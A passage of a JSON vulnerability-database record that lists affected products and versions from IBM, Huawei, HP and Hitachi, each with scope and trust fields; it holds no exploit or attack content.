          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "infosphere master data management server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "infosphere master data management server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "infosphere master data management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "infosphere mashuphub",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "infosphere mashuphub",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "infosphere guardium data redaction",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "business monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.1"
          },
          {
            "_id": null,
            "model": "business monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "forms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "forms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.02"
          },
          {
            "_id": null,
            "model": "forms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "forms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "forms experience builder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "forms experience builder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ac1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ac0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ac1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ac0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9840-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "840"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "840"
          },
          {
            "_id": null,
            "model": "flashsystem 9843-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "840"
          },
          {
            "_id": null,
            "model": "flashsystem 9840-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "840"
          },
          {
            "_id": null,
            "model": "flashsystem",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8400"
          },
          {
            "_id": null,
            "model": "filenet services for lotus quickr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "filenet p8 application engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "filenet content manager workplace xt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.5"
          },
          {
            "_id": null,
            "model": "filenet content manager workplace xt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.4"
          },
          {
            "_id": null,
            "model": "filenet content manager workplace xt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.3"
          },
          {
            "_id": null,
            "model": "filenet content manager workplace xt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.2"
          },
          {
            "_id": null,
            "model": "filenet content manager workplace xt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.1"
          },
          {
            "_id": null,
            "model": "filenet content manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.0"
          },
          {
            "_id": null,
            "model": "filenet collaboration services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "filenet business process framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.0"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.122"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.11"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.19"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.19"
          },
          {
            "_id": null,
            "model": "content manager services for lotus quickr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "content manager services for lotus quickr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "content integrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "content integrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "content foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.0"
          },
          {
            "_id": null,
            "model": "content analytics with enterprise search",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "content analytics with enterprise search",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.1"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.0"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.3"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.6"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.5"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.4"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.3"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.6"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.5"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.4"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.1"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.5.4"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.5.3"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.5.2"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.4.5"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.4.4"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.4.3"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "business process manager advanced on z/os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0"
          },
          {
            "_id": null,
            "model": "business process manager advanced on z/os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0"
          },
          {
            "_id": null,
            "model": "business process manager advanced on z/os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "business monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "usg9580 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "usg9560 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "usg9520 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "eudemon8000e-x8 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "eudemon8000e-x3 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "eudemon8000e-x16 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "espace meeting portal v100r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "anyoffice v200r002c10spc500",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "antiddos v100r001c00",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "8080"
          },
          {
            "_id": null,
            "model": "antiddos v100r001c00",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "8060"
          },
          {
            "_id": null,
            "model": "antiddos v100r001c00",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "8030"
          },
          {
            "_id": null,
            "model": "antiddos 500-d v100r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "antiddos v100r001c00",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "1550"
          },
          {
            "_id": null,
            "model": "antiddos v100r001c00",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "huawei",
            "version": "1520"
          },
          {
            "_id": null,
            "model": "sitescope monitors 11.32ip1",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "sitescope monitors",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.20"
          },
          {
            "_id": null,
            "model": "sdn van controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "insight control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.5.1"
          },
          {
            "_id": null,
            "model": "insight control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "insight control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "insight control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "insight control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-01"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-01"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus developer )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "0109-50"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus developer (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-01"
          },
          {
            "_id": null,
            "model": "ucosminexus developer hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus developer (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus developer hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus developer (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus developer hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "programming environment for java hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "programming environment for java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "programming environment for java (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "programming environment for java hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "programming environment for java (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "programming environment for java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "programming environment for java hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "programming environment for java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-10-03"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-10"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-02-04"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-02"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01-03"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01-02"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01-01"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-00-02"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-00-01"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-00"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51-05"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51-04"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51-03"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51-02"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51-01"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-51"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50-03"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50-02"
          },
          {
            "_id": null,
            "model": "jp1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01-06"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01-03"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-10-01"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50-03"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50-02"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50-01"
          },
          {
            "_id": null,
            "model": "job management partner 1/it desktop management manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-50"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "04-00-06"
          },
          {
            "_id": null,
